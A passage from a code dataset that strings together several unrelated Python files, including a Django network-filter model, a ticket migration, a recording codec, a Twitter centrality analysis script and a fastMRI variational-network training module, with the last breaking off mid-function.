MergeGroupQualityMeasures) | 1.054688 | 1 |
networkapi/filter/models.py | vinicius-marinho/GloboNetworkAPI | 73 | 12761635 | <filename>networkapi/filter/models.py
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.db.models import Count
from networkapi.exception import InvalidValueError
from networkapi.infrastructure.ipaddr import IPNetwork
from networkapi.models.BaseModel import BaseModel
from networkapi.util import clone
from networkapi.util import is_valid_string_maxsize
from networkapi.util import is_valid_string_minsize
from networkapi.util import is_valid_text
class FilterError(Exception):
"""An error occurred during Filter table access."""
def __init__(self, cause, message=None):
self.cause = cause
self.message = message
def __str__(self):
        msg = u'Cause: %s, Message: %s' % (self.cause, self.message)
return msg.encode('utf-8', 'replace')
class FilterNotFoundError(FilterError):
"""Returns exception for Filter search by pk."""
def __init__(self, cause, message=None):
FilterError.__init__(self, cause, message)
class FilterDuplicateError(FilterError):
"""Returns exception for Filter name already existing."""
def __init__(self, cause, message=None):
FilterError.__init__(self, cause, message)
class CannotDissociateFilterError(FilterError):
"""Returns exception for Filter in use in environment, cannot be dissociated."""
def __init__(self, cause, message=None):
FilterError.__init__(self, cause, message)
class Filter(BaseModel):
id = models.AutoField(primary_key=True, db_column='id_filter')
name = models.CharField(
max_length=100, blank=False, unique=True, db_column='name')
description = models.CharField(
max_length=200, null=True, blank=True, db_column='description')
log = logging.getLogger('Filter')
class Meta(BaseModel.Meta):
db_table = u'filter'
managed = True
@classmethod
def get_by_pk(cls, id_):
""""Get Filter by id.
@return: Filter.
@raise FilterNotFoundError: Filter is not registered.
@raise FilterError: Failed to search for the Filter.
"""
try:
return Filter.objects.get(pk=id_)
        except ObjectDoesNotExist as e:
            raise FilterNotFoundError(
                e, u'There is no Filter with pk = %s.' % id_)
        except Exception as e:
            cls.log.error(u'Failure to search the filter.')
            raise FilterError(e, u'Failure to search the filter.')
def delete(self):
"""Override Django's method to remove filter
Before removing the filter removes all relationships with equipment type.
"""
# Remove all Filter and TipoEquipamento relations
for filter_equiptype in self.filterequiptype_set.all():
filter_equiptype.delete()
super(Filter, self).delete()
def validate_filter(self, filter_map):
"""Validates filter fields before add
@param filter_map: Map with the data of the request.
@raise InvalidValueError: Represents an error occurred validating a value.
"""
# Get XML data
name = filter_map['name']
description = filter_map['description']
# name can NOT be greater than 100
if not is_valid_string_minsize(name, 3) or not is_valid_string_maxsize(name, 100) or not is_valid_text(name):
self.log.error(u'Parameter name is invalid. Value: %s.', name)
raise InvalidValueError(None, 'name', name)
# description can NOT be greater than 200
if not is_valid_string_minsize(description, 3, False) or not is_valid_string_maxsize(description, 200, False) or not is_valid_text(description, True):
self.log.error(
u'Parameter description is invalid. Value: %s.', description)
raise InvalidValueError(None, 'description', description)
# Verify existence
if len(Filter.objects.filter(name=name).exclude(id=self.id)) > 0:
raise FilterDuplicateError(
                None, u'A filter named %s already exists in the database.' % name)
# set variables
self.name = name
self.description = description
def check_filter_use(new_filter_id, env):
from networkapi.equipamento.models import EquipamentoAmbiente
from networkapi.ip.models import NetworkIPv4, NetworkIPv6
from networkapi.vlan.models import Vlan
try:
# Check existence of new filter
new_fil = Filter.objects.get(pk=new_filter_id)
    except ObjectDoesNotExist:
        new_fil = None
# Filters
old_fil = env.filter
if old_fil is not None:
# Envs using old filter
envs_old_filter = old_fil.ambiente_set.all()
# Vlans in listed envs
vlans = list()
for env_old_filter in envs_old_filter:
for vlan in env_old_filter.vlan_set.all():
vlans.append(vlan)
# Nets in vlan
nets_ipv4 = list()
nets_ipv6 = list()
for vlan in vlans:
for net in vlan.networkipv4_set.all():
nets_ipv4.append({'net': net, 'vlan_env': vlan.ambiente})
for net in vlan.networkipv6_set.all():
nets_ipv6.append({'net': net, 'vlan_env': vlan.ambiente})
# Verify subnet ipv4
for i in range(0, len(nets_ipv4)):
net = nets_ipv4[i].get('net')
ip = '%s.%s.%s.%s/%s' % (net.oct1,
net.oct2, net.oct3, net.oct4, net.block)
network_ip_verify = IPNetwork(ip)
nets_ipv4_aux = clone(nets_ipv4)
nets_ipv4_aux.remove(nets_ipv4[i])
if verify_subnet_and_equip(nets_ipv4_aux, network_ip_verify, 'v4',
net, nets_ipv4[i].get('vlan_env')):
env_aux_id = nets_ipv4[i].get('vlan_env').id
if env.id == env_aux_id:
raise CannotDissociateFilterError(
                        old_fil.name, u'Filter %s cannot be dissociated, it is in use.' % old_fil.name)
# Verify subnet ipv6
for i in range(0, len(nets_ipv6)):
net = nets_ipv6[i].get('net')
ip = '%s:%s:%s:%s:%s:%s:%s:%s/%d' % (net.block1, net.block2, net.block3,
net.block4, net.block5, net.block6,
net.block7, net.block8, net.block)
network_ip_verify = IPNetwork(ip)
nets_ipv6_aux = clone(nets_ipv6)
nets_ipv6_aux.remove(nets_ipv6[i])
if verify_subnet_and_equip(nets_ipv6_aux, network_ip_verify, 'v6',
net, nets_ipv6[i].get('vlan_env')):
env_aux_id = nets_ipv6[i].get('vlan_env').id
if env.id == env_aux_id:
raise CannotDissociateFilterError(
                        old_fil.name, u'Filter %s cannot be dissociated, it is in use.' % old_fil.name)
old_tp_equips = [
fet.equiptype.id for fet in old_fil.filterequiptype_set.all()]
if new_fil is not None:
new_tp_equips = [
fet.equiptype.id for fet in new_fil.filterequiptype_set.all()]
else:
new_tp_equips = []
# EquipTypes being excluded, check for these in environments
diff_tp_equips = list(set(old_tp_equips) - set(new_tp_equips))
# Check equipments with type in diff, associated to this environment
if len(diff_tp_equips) > 0:
# Filter case 1 and 2
# Check for networks with same ip range
nets_same_range = NetworkIPv4.objects.values(
'oct1', 'oct2', 'oct3', 'oct4', 'block'
).annotate(count=Count('id')).filter(count__gt=1)
if len(nets_same_range) > 0:
for net_gp in nets_same_range:
nets_current_range = NetworkIPv4.objects.filter(
oct1=net_gp['oct1'],
oct2=net_gp['oct2'],
oct3=net_gp['oct3'],
oct4=net_gp['oct4'],
block=net_gp['block']
)
envs_of_nets = [
net_crt.vlan.ambiente.id for net_crt in nets_current_range]
if env.id in envs_of_nets:
eqas = EquipamentoAmbiente.objects.filter(
equipamento__tipo_equipamento__in=diff_tp_equips, ambiente=env.id)
equips_in_env = [eqa.equipamento.id for eqa in eqas]
# Get other environments with these equips
other_envs = [eqa.ambiente.id for eqa in EquipamentoAmbiente.objects.filter(
equipamento__in=equips_in_env,
ambiente__in=envs_of_nets
).exclude(ambiente=env.id)]
if len(other_envs) > 0:
raise CannotDissociateFilterError(
                            old_fil.name, u'Filter %s cannot be dissociated, it is in use.' % old_fil.name)
# Check for networks v6 with same ip range
nets_same_range_v6 = NetworkIPv6.objects.values(
'block1', 'block2', 'block3', 'block4',
'block5', 'block6', 'block7', 'block8', 'block'
).annotate(count=Count('id')).filter(count__gt=1)
if len(nets_same_range_v6) > 0:
for net_gp in nets_same_range_v6:
nets_current_range = NetworkIPv6.objects.filter(
block1=net_gp['block1'],
block2=net_gp['block2'],
block3=net_gp['block3'],
block4=net_gp['block4'],
block5=net_gp['block5'],
block6=net_gp['block6'],
block7=net_gp['block7'],
block8=net_gp['block8'],
block=net_gp['block']
)
envs_of_nets = [
net_crt.vlan.ambiente.id for net_crt in nets_current_range]
if env.id in envs_of_nets:
eqas = EquipamentoAmbiente.objects.filter(
equipamento__tipo_equipamento__in=diff_tp_equips, ambiente=env.id)
equips_in_env = [eqa.equipamento.id for eqa in eqas]
# Get other environments with these equips
other_envs = [eqa.ambiente.id for eqa in EquipamentoAmbiente.objects.filter(
equipamento__in=equips_in_env,
ambiente__in=envs_of_nets
).exclude(ambiente=env.id)]
if len(other_envs) > 0:
raise CannotDissociateFilterError(
                            old_fil.name, u'Filter %s cannot be dissociated, it is in use.' % old_fil.name)
# End of filter case 1 and 2
# Filter case 3
# Get vlans with same number
vlans_same_number = Vlan.objects.values('num_vlan').annotate(
count=Count('id')).filter(count__gt=1)
if len(vlans_same_number) > 0:
for vlan_gp in vlans_same_number:
vlans_current_number = Vlan.objects.filter(
num_vlan=vlan_gp['num_vlan'])
envs_of_vlans = [
vlan.ambiente.id for vlan in vlans_current_number]
if env.id in envs_of_vlans:
eqas = EquipamentoAmbiente.objects.filter(
ambiente=env.id)
equips_in_env = [eqa.equipamento.id for eqa in eqas]
# Get other environments with these equips
other_envs = [eqa.ambiente.id for eqa in EquipamentoAmbiente.objects.filter(
equipamento__in=equips_in_env,
ambiente__in=envs_of_vlans
).exclude(ambiente=env.id)]
if len(other_envs) > 0:
raise CannotDissociateFilterError(
                        old_fil.name, u'Filter %s cannot be dissociated, it is in use.' % old_fil.name)
env.filter = new_fil
return env
# End of filters
def verify_subnet_and_equip(vlan_net, network_ip, version, net_obj, env_obj):
# Check if an equipment is shared in a subnet
equip_list = get_equips(net_obj, env_obj)
# One vlan may have many networks, iterate over it
for net_env in vlan_net:
net = net_env.get('net')
env = net_env.get('vlan_env')
if version == 'v4':
ip = '%s.%s.%s.%s/%s' % (net.oct1, net.oct2, net.oct3,
net.oct4, net.block)
else:
ip = '%s:%s:%s:%s:%s:%s:%s:%s/%d' % (net.block1, net.block2, net.block3,
net.block4, net.block5, net.block6,
net.block7, net.block8, net.block)
ip_net = IPNetwork(ip)
# If some network, inside this vlan, is subnet of network search param
if ip_net in network_ip:
equip_list_aux = get_equips(net, env)
if len(set(equip_list) & set(equip_list_aux)) > 0:
                # this vlan is among the vlans found; no need to continue
                # checking
                return True
# If some network, inside this vlan, is supernet of network search
# param
if network_ip in ip_net:
equip_list_aux = get_equips(net, env)
if len(set(equip_list) & set(equip_list_aux)) > 0:
                # this vlan is among the vlans found; no need to continue
                # checking
                return True
    # If no subnet was found, return False
return False
def get_equips(net_obj, env_obj):
equip_list = list()
for equip in env_obj.equipamentoambiente_set.all():
if equip.equipamento_id not in equip_list:
equip_list.append(equip.equipamento_id)
try:
for ip in net_obj.ip_set.all():
for equip in ip.ipequipamento_set.all():
if equip.id not in equip_list:
equip_list.append(equip.id)
except:
for ip in net_obj.ipv6_set.all():
for equip in ip.ipv6equipament_set.all():
if equip.id not in equip_list:
equip_list.append(equip.id)
return equip_list
| 1.984375 | 2 |
tickets/migrations/0001_initial.py | dieisonborges/sicario | 1 | 12761636 | # Generated by Django 3.1.2 on 2020-10-20 19:06
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Ticket',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('protocol', models.CharField(max_length=10)),
('status', models.BooleanField(default=False)),
('short_description', models.CharField(max_length=50)),
('description', models.CharField(max_length=200)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Action',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('short_description', models.CharField(max_length=50)),
('description', models.CharField(max_length=200)),
('ticket', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tickets.ticket')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 1.710938 | 2 |
aionetworking/formats/recording.py | primal100/aionetworking | 0 | 12761637 | <reponame>primal100/aionetworking<gh_stars>0
from dataclasses import dataclass
from .base import BaseMessageObject
from collections import namedtuple
from pathlib import Path
from .contrib.pickle import PickleCodec
from typing import AsyncGenerator, Tuple
recorded_packet = namedtuple("recorded_packet", ["sent_by_server", "timestamp", "sender", "data"])
@dataclass
class BufferCodec(PickleCodec):
log_msgs = False
    async def decode(self, encoded: bytes, **kwargs) -> AsyncGenerator[Tuple[bytes, recorded_packet], None]:
async for encoded, decoded in super().decode(encoded, **kwargs):
yield encoded, recorded_packet(*decoded)
async def encode(self, decoded: bytes, system_timestamp=None, **kwargs) -> bytes:
if self.context:
sender = self.context.get('address')
else:
sender = None
packet_data = (
False,
system_timestamp,
sender,
decoded
)
return await super().encode(packet_data, **kwargs)
@dataclass
class BufferObject(BaseMessageObject):
name = 'Buffer'
codec_cls = BufferCodec
def get_recording_codec() -> PickleCodec:
return BufferCodec(BufferObject)
async def get_recording(data: bytes) -> AsyncGenerator[recorded_packet, None]:
codec = get_recording_codec()
async for item in codec.decode_buffer(data):
yield item.decoded
async def get_recording_from_file(path: Path) -> AsyncGenerator[recorded_packet, None]:
codec = get_recording_codec()
async for item in codec.from_file(path):
yield item.decoded
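# Usage sketch (hypothetical file path): replay the packets stored in a
# recording written by BufferCodec.
#
# import asyncio
#
# async def replay() -> None:
#     async for packet in get_recording_from_file(Path('recording.pickle')):
#         print(packet.timestamp, packet.sender, packet.data)
#
# asyncio.run(replay())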
| 2.296875 | 2 |
resources/site-packages/kodi_six/xbmcplugin.py | projectx13/plugin.video.projectx | 0 | 12761638 | <reponame>projectx13/plugin.video.projectx
# coding: utf-8
# Created on: 04.01.2018
# Author: <NAME> aka <NAME>. (<EMAIL>)
"""
Functions to create media contents plugins
"""
from __future__ import absolute_import
import sys as _sys
from .utils import PY2 as _PY2, ModuleWrapper as _ModuleWrapper
if _PY2:
import xbmcplugin as _xbmcplugin
_wrapped_xbmcplugin = _ModuleWrapper(_xbmcplugin)
_sys.modules[__name__] = _wrapped_xbmcplugin
else:
from xbmcplugin import *
| 1.328125 | 1 |
ex3_03.py | sevmardi/Twitter-network-analysis | 0 | 12761639 | <filename>ex3_03.py
import networkx as nx
import numpy as np
import cPickle as pickle
# import _pickle as pickle
from timeit import default_timer as timer
from graph_tool.all import *
import graph_tool.centrality  # bind the `graph_tool` name for the qualified calls below
from operator import itemgetter
from collections import Counter
import math
import csv
csv_twitter_small_dataset = "csv/twitter-small.csv"
csv_graph_tool_twitter_small_dataset = 'csv/csv_graph_tool_twitter-small.csv'
csv_twitter_large_dataset = "csv/twitter-large.csv"
csv_graph_tool_twitter_large_dataset = 'csv/csv_graph_tool_twitter-large.csv'
def closeness_centrality(Graph, vp_source_username):
close = graph_tool.centrality.closeness(Graph)
c_list = []
for user in Graph.vertices():
if close[user] > 0:
c_list += [(vp_source_username[user], close[user])]
c_list = sorted(c_list, key=itemgetter(1), reverse=True)[:20]
# print('Closness')
for i in range(len(c_list)):
print(c_list[i][0])
print('\n')
def betweenness_centrality(Graph, vp_source_username):
betweenness = graph_tool.centrality.betweenness(Graph)
b_list = []
print('Betweenness')
for user in Graph.vertices():
        if betweenness[0][user] > 0:
            # append (username, score) tuples so sorting by itemgetter(1) works;
            # extending with a bare list would interleave names and scores
            b_list += [(vp_source_username[user], betweenness[0][user])]
b_list = sorted(b_list, key=itemgetter(1), reverse=True)[:20]
for i in range(len(b_list)):
print(b_list[i][0])
print('\n')
def in_degree_centrality(file):
parser = parse_file_to_digraph(file)
idg = nx.in_degree_centrality(parser)
idc_list = []
for user in idg:
idc_list += [(user, idg[user])]
print('In Degree Centrality')
idc_list = sorted(idc_list, key=itemgetter(1), reverse=True)[:20]
for i in range(len(idc_list)):
print(idc_list[i][0])
def out_degree_centrality(file):
parser = parse_file_to_digraph(file)
odg = nx.out_degree_centrality(parser)
odc_list = []
for user in odg:
odc_list += [(user, odg[user])]
print('Out Degree Centrality')
odc_list = sorted(odc_list, key=itemgetter(1), reverse=True)[:20]
for i in range(len(odc_list)):
print(odc_list[i][0])
print('\n')
def parse_file_to_digraph(filename):
"""
Create a Di graph.
"""
dg = nx.DiGraph()
with open(filename, 'r') as files:
for line in files:
line = line.rstrip('\n')
v = line.split(",")
dg.add_edge(v[0], v[1], {'weight': v[2], 'timestamp': v[3]})
return dg
def main():
# small = parse_file_to_digraph(csv_twitter_small_dataset)
# in_degree_centrality(small)
# large = parse_file_to_digraph(csv_twitter_large_dataset)
# in_degree_centrality(large)
G = Graph()
start_time = timer()
vp_source_username = G.new_vertex_property("string")
vp_target_username = G.new_vertex_property("string")
vp_weight = G.new_vertex_property("int")
vp_timestamp = G.new_vertex_property("int")
with open(csv_graph_tool_twitter_small_dataset, 'r') as file:
reader = csv.reader(file, delimiter=',', quotechar='|')
reader.next() # skip header
for c in reader:
src_id = c[0]
target_id = c[1]
src_name = c[2]
target_name = c[3]
            # graph_tool expects integer vertex indices, so convert the CSV strings
            G.add_edge(int(src_id), int(target_id))
            vp_source_username[G.vertex(int(src_id))] = src_name
            vp_target_username[G.vertex(int(target_id))] = target_name
out_degree_centrality(csv_twitter_small_dataset)
if __name__ == '__main__':
main()
| 2.5625 | 3 |
fastmri_examples/adaptive_varnet/pl_modules/varnet_module.py | Gaskell-1206/fastMRI | 0 | 12761640 | """
Copyright (c) Facebook, Inc. and its affiliates.
This source code is licensed under the MIT license found in the
LICENSE file in the root directory of this source tree.
"""
from argparse import ArgumentParser
from collections import defaultdict
from typing import Optional
import fastmri
import numpy as np
import torch
import torch.nn as nn
from fastmri import evaluate
from fastmri.data import transforms
from fastmri.data.transforms import VarNetSample
from fastmri.models.adaptive_varnet import AdaptiveSensitivityModel, AdaptiveVarNetBlock
from fastmri.models.varnet import NormUnet
from fastmri.pl_modules.mri_module import MriModule
from .metrics import DistributedMetricSum, DistributedArraySum
class VarNet(nn.Module):
"""
A full variational network model.
This model applies a combination of soft data consistency with a U-Net
regularizer. To use non-U-Net regularizers, use VarNetBlock.
"""
def __init__(
self,
num_cascades: int = 12,
sens_chans: int = 8,
sens_pools: int = 4,
chans: int = 18,
pools: int = 4,
num_sense_lines: Optional[int] = None,
hard_dc: bool = False,
dc_mode: str = "simul",
sparse_dc_gradients: bool = True,
):
"""
Args:
num_cascades: Number of cascades (i.e., layers) for variational
network.
sens_chans: Number of channels for sensitivity map U-Net.
            sens_pools: Number of downsampling and upsampling layers for
sensitivity map U-Net.
chans: Number of channels for cascade U-Net.
pools: Number of downsampling and upsampling layers for cascade
U-Net.
num_sense_lines: Number of low-frequency lines to use for
sensitivity map computation, must be even or `None`. Default
`None` will automatically compute the number from masks.
Default behaviour may cause some slices to use more
low-frequency lines than others, when used in conjunction with
e.g. the EquispacedMaskFunc defaults.
hard_dc: Whether to do hard DC layers instead of soft (learned).
dc_mode: str, whether to do DC before ('first'), after ('last') or
simultaneously ('simul') with Refinement step. Default 'simul'.
sparse_dc_gradients: Whether to sparsify the gradients in DC by
using torch.where() with the mask: this essentially removes
gradients for the policy on unsampled rows. This should change
nothing for the non-active VarNet.
"""
super().__init__()
self.num_sense_lines = num_sense_lines
self.hard_dc = hard_dc
self.dc_mode = dc_mode
self.sparse_dc_gradients = sparse_dc_gradients
self.sens_net = AdaptiveSensitivityModel(
sens_chans, sens_pools, num_sense_lines=num_sense_lines
)
self.cascades = nn.ModuleList(
[
AdaptiveVarNetBlock(
NormUnet(chans, pools),
hard_dc=hard_dc,
dc_mode=dc_mode,
sparse_dc_gradients=sparse_dc_gradients,
)
for _ in range(num_cascades)
]
)
def forward(
self, kspace: torch.Tensor, masked_kspace: torch.Tensor, mask: torch.Tensor
):
extra_outputs = defaultdict(list)
sens_maps = self.sens_net(masked_kspace, mask)
extra_outputs["sense"].append(sens_maps.detach().cpu())
kspace_pred = masked_kspace.clone()
extra_outputs["masks"].append(mask.detach().cpu())
# Store current reconstruction
current_recon = fastmri.complex_abs(
self.sens_reduce(masked_kspace, sens_maps)
).squeeze(1)
extra_outputs["recons"].append(current_recon.detach().cpu())
for cascade in self.cascades:
kspace_pred = cascade(
kspace_pred, masked_kspace, mask, sens_maps, kspace=kspace
)
            # Store current reconstruction from the cascade's updated k-space
            # (reconstructing from masked_kspace would store the same zero-filled
            # image every iteration)
            current_recon = fastmri.complex_abs(
                self.sens_reduce(kspace_pred, sens_maps)
            ).squeeze(1)
extra_outputs["recons"].append(current_recon.detach().cpu())
# Could presumably do complex_abs(complex_rss()) instead and get same result?
output = fastmri.rss(fastmri.complex_abs(fastmri.ifft2c(kspace_pred)), dim=1)
return output, extra_outputs
def sens_reduce(self, x: torch.Tensor, sens_maps: torch.Tensor) -> torch.Tensor:
x = fastmri.ifft2c(x)
return fastmri.complex_mul(x, fastmri.complex_conj(sens_maps)).sum(
dim=1, keepdim=True
)
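# Shape sketch (illustrative only): fastMRI k-space tensors are complex-as-
# last-dim, i.e. (batch, coils, height, width, 2), and the mask broadcasts
# over the same shape.
#
# model = VarNet(num_cascades=2, chans=8)
# output, extras = model(kspace, masked_kspace, mask)
# # `output` is a magnitude image of shape (batch, height, width); `extras`
# # collects per-cascade reconstructions, the mask and the sensitivity maps.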
class VarNetModule(MriModule):
"""
VarNet training module.
This can be used to train variational networks from the paper:
<NAME> al. End-to-end variational networks for accelerated MRI
reconstruction. In International Conference on Medical Image Computing and
Computer-Assisted Intervention, 2020.
which was inspired by the earlier paper:
<NAME> et al. Learning a variational network for reconstruction of
    accelerated MRI data. Magnetic Resonance in Medicine, 79(6):3055–3071, 2018.
"""
def __init__(
self,
num_cascades: int = 12,
pools: int = 4,
chans: int = 18,
sens_pools: int = 4,
sens_chans: int = 8,
lr: float = 0.0003,
lr_step_size: int = 40,
lr_gamma: float = 0.1,
weight_decay: float = 0.0,
num_sense_lines: int = None,
hard_dc: bool = False,
dc_mode: str = "simul",
sparse_dc_gradients: bool = True,
**kwargs,
):
"""
Args:
num_cascades: Number of cascades (i.e., layers) for variational
network.
pools: Number of downsampling and upsampling layers for cascade
U-Net.
chans: Number of channels for cascade U-Net.
sens_pools: Number of downsampling and upsampling layers for
sensitivity map U-Net.
sens_chans: Number of channels for sensitivity map U-Net.
lr: Learning rate.
lr_step_size: Learning rate step size.
lr_gamma: Learning rate gamma decay.
weight_decay: Parameter for penalizing weights norm.
num_sense_lines: Number of low-frequency lines to use for sensitivity map
computation, must be even or `None`. Default `None` will automatically
compute the number from masks. Default behaviour may cause some slices to
use more low-frequency lines than others, when used in conjunction with
e.g. the EquispacedMaskFunc defaults.
hard_dc: Whether to do hard DC layers instead of soft (learned).
dc_mode: str, whether to do DC before ('first'), after ('last') or
simultaneously ('simul') with Refinement step. Default 'simul'.
sparse_dc_gradients: Whether to sparsify the gradients in DC by using torch.where()
with the mask: this essentially removes gradients for the policy on unsampled rows. This should
change nothing for the non-active VarNet.
"""
super().__init__()
self.save_hyperparameters()
self.num_cascades = num_cascades
self.pools = pools
self.chans = chans
self.sens_pools = sens_pools
self.sens_chans = sens_chans
self.lr = lr
self.lr_step_size = lr_step_size
self.lr_gamma = lr_gamma
self.weight_decay = weight_decay
self.num_sense_lines = num_sense_lines
self.hard_dc = hard_dc
self.dc_mode = dc_mode
self.sparse_dc_gradients = sparse_dc_gradients
# logging functions
self.NMSE = DistributedMetricSum()
self.SSIM = DistributedMetricSum()
self.PSNR = DistributedMetricSum()
self.ValLoss = DistributedMetricSum()
self.TotExamples = DistributedMetricSum()
self.TotSliceExamples = DistributedMetricSum()
self.ValMargDist = DistributedArraySum()
self.ValCondEnt = DistributedMetricSum()
self.TrainNMSE = DistributedMetricSum()
self.TrainSSIM = DistributedMetricSum()
self.TrainPSNR = DistributedMetricSum()
self.TrainLoss = DistributedMetricSum()
self.TrainTotExamples = DistributedMetricSum()
self.TrainTotSliceExamples = DistributedMetricSum()
self.TrainMargDist = DistributedArraySum()
self.TrainCondEnt = DistributedMetricSum()
self.varnet = VarNet(
num_cascades=self.num_cascades,
sens_chans=self.sens_chans,
sens_pools=self.sens_pools,
chans=self.chans,
pools=self.pools,
num_sense_lines=self.num_sense_lines,
hard_dc=self.hard_dc,
dc_mode=self.dc_mode,
sparse_dc_gradients=self.sparse_dc_gradients,
)
self.loss = fastmri.SSIMLoss()
def forward(self, kspace, masked_kspace, mask):
return self.varnet(kspace, masked_kspace, mask)
def training_step(self, batch, batch_idx):
output, extra_outputs = self(batch.kspace, batch.masked_kspace, batch.mask)
target, output = transforms.center_crop_to_smallest(batch.target, output)
# NOTE: Using max value here...
loss = self.loss(
output.unsqueeze(1), target.unsqueeze(1), data_range=batch.max_value
)
self.log("train_loss", loss)
# Return same stuff as on validation step here
return {
"batch_idx": batch_idx,
"fname": batch.fname,
"slice_num": batch.slice_num,
"max_value": batch.max_value,
"output": output,
"target": target,
"loss": loss,
"extra_outputs": extra_outputs,
}
def training_step_end(self, train_logs):
# check inputs
for k in (
"batch_idx",
"fname",
"slice_num",
"max_value",
"output",
"target",
"loss",
"extra_outputs",
):
if k not in train_logs.keys():
raise RuntimeError(
f"Expected key {k} in dict returned by training_step."
)
if train_logs["output"].ndim == 2:
train_logs["output"] = train_logs["output"].unsqueeze(0)
elif train_logs["output"].ndim != 3:
raise RuntimeError("Unexpected output size from training_step.")
if train_logs["target"].ndim == 2:
train_logs["target"] = train_logs["target"].unsqueeze(0)
elif train_logs["target"].ndim != 3:
raise RuntimeError("Unexpected output size from training_step.")
# compute evaluation metrics
mse_vals = defaultdict(dict)
target_norms = defaultdict(dict)
ssim_vals = defaultdict(dict)
max_vals = dict()
for i, fname in enumerate(train_logs["fname"]):
slice_num = int(train_logs["slice_num"][i].cpu())
maxval = train_logs["max_value"][i].cpu().numpy()
output = train_logs["output"][i].detach().cpu().numpy()
target = train_logs["target"][i].cpu().numpy()
mse_vals[fname][slice_num] = torch.tensor(
evaluate.mse(target, output)
).view(1)
target_norms[fname][slice_num] = torch.tensor(
evaluate.mse(target, np.zeros_like(target))
).view(1)
ssim_vals[fname][slice_num] = torch.tensor(
evaluate.ssim(target[None, ...], output[None, ...], maxval=maxval)
).view(1)
max_vals[fname] = maxval
return {
"loss": train_logs["loss"],
"mse_vals": mse_vals,
"target_norms": target_norms,
"ssim_vals": ssim_vals,
"max_vals": max_vals,
}
def validation_step(self, batch, batch_idx):
batch: VarNetSample
output, extra_outputs = self.forward(
batch.kspace, batch.masked_kspace, batch.mask
)
target, output = transforms.center_crop_to_smallest(batch.target, output)
return {
"batch_idx": batch_idx,
"fname": batch.fname,
"slice_num": batch.slice_num,
"max_value": batch.max_value,
"output": output,
"target": target,
"val_loss": self.loss(
output.unsqueeze(1), target.unsqueeze(1), data_range=batch.max_value
),
"extra_outputs": extra_outputs,
}
def validation_step_end(self, val_logs):
# check inputs
for k in (
"batch_idx",
"fname",
"slice_num",
"max_value",
"output",
"target",
"val_loss",
):
if k not in val_logs.keys():
raise RuntimeError(
f"Expected key {k} in dict returned by validation_step."
)
if val_logs["output"].ndim == 2:
val_logs["output"] = val_logs["output"].unsqueeze(0)
elif val_logs["output"].ndim != 3:
raise RuntimeError("Unexpected output size from validation_step.")
if val_logs["target"].ndim == 2:
val_logs["target"] = val_logs["target"].unsqueeze(0)
elif val_logs["target"].ndim != 3:
raise RuntimeError("Unexpected output size from validation_step.")
# pick a set of images to log if we don't have one already
if self.val_log_indices is None:
self.val_log_indices = list(
np.random.permutation(len(self.trainer.val_dataloaders[0]))[
: self.num_log_images
]
)
# log images to tensorboard
if isinstance(val_logs["batch_idx"], int):
batch_indices = [val_logs["batch_idx"]]
else:
batch_indices = val_logs["batch_idx"]
for i, batch_idx in enumerate(batch_indices):
if batch_idx in self.val_log_indices:
key = f"val_images_idx_{batch_idx}"
target = val_logs["target"][i].unsqueeze(0)
output = val_logs["output"][i].unsqueeze(0)
error = torch.abs(target - output)
output = output / output.max()
target = target / target.max()
error = error / error.max()
self.log_image(f"{key}/target", target)
self.log_image(f"{key}/reconstruction", output)
self.log_image(f"{key}/error", error)
# compute evaluation metrics
mse_vals = defaultdict(dict)
target_norms = defaultdict(dict)
ssim_vals = defaultdict(dict)
max_vals = dict()
for i, fname in enumerate(val_logs["fname"]):
slice_num = int(val_logs["slice_num"][i].cpu())
maxval = val_logs["max_value"][i].cpu().numpy()
output = val_logs["output"][i].cpu().numpy()
target = val_logs["target"][i].cpu().numpy()
mse_vals[fname][slice_num] = torch.tensor(
evaluate.mse(target, output)
).view(1)
target_norms[fname][slice_num] = torch.tensor(
evaluate.mse(target, np.zeros_like(target))
).view(1)
ssim_vals[fname][slice_num] = torch.tensor(
evaluate.ssim(target[None, ...], output[None, ...], maxval=maxval)
).view(1)
max_vals[fname] = maxval
return {
"val_loss": val_logs["val_loss"],
"mse_vals": mse_vals,
"target_norms": target_norms,
"ssim_vals": ssim_vals,
"max_vals": max_vals,
}
def training_epoch_end(self, train_logs):
losses = []
mse_vals = defaultdict(dict)
target_norms = defaultdict(dict)
ssim_vals = defaultdict(dict)
max_vals = dict()
# use dict updates to handle duplicate slices
for train_log in train_logs:
losses.append(train_log["loss"].data.view(-1))
for k in train_log["mse_vals"].keys():
mse_vals[k].update(train_log["mse_vals"][k])
for k in train_log["target_norms"].keys():
target_norms[k].update(train_log["target_norms"][k])
for k in train_log["ssim_vals"].keys():
ssim_vals[k].update(train_log["ssim_vals"][k])
for k in train_log["max_vals"]:
max_vals[k] = train_log["max_vals"][k]
# check to make sure we have all files in all metrics
assert (
mse_vals.keys()
== target_norms.keys()
== ssim_vals.keys()
== max_vals.keys()
)
# apply means across image volumes
metrics = {"nmse": 0, "ssim": 0, "psnr": 0}
local_examples = 0
for fname in mse_vals.keys():
local_examples = local_examples + 1
mse_val = torch.mean(
torch.cat([v.view(-1) for _, v in mse_vals[fname].items()])
)
target_norm = torch.mean(
torch.cat([v.view(-1) for _, v in target_norms[fname].items()])
)
metrics["nmse"] = metrics["nmse"] + mse_val / target_norm
metrics["psnr"] = (
